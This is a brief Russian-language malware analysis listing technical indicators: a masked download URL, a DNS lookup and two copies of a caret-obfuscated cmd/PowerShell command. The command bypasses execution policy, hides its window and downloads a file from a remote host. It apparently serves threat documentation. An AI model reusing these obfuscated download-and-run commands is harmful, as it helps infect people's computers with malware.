Техническая информация
- http://vv###otad.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^Er^shE^ll.^eXe^ -eXec^U^T^I^onPO^Li^cY byP^A^sS -nop^rofile ^-WI^Nd^oWS^TYL^e^ ^H^i^dD^en (^nE^w^-OBj^E^CT^ s^YstE^m^.NEt.W^ebclieNT).dO^WnLOadFI^L^E^('http://vv###otad.top/...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /c "Po^W^Er^shE^ll.^eXe^ -eXec^U^T^I^onPO^Li^cY byP^A^sS -nop^rofile ^-WI^Nd^oWS^TYL^e^ ^H^i^dD^en (^nE^w^-OBj^E^CT^ s^YstE^m^.NEt.W^ebclieNT).dO^WnLOadFI^L^E^('http://vv###otad.top/...' (со скрытым окном)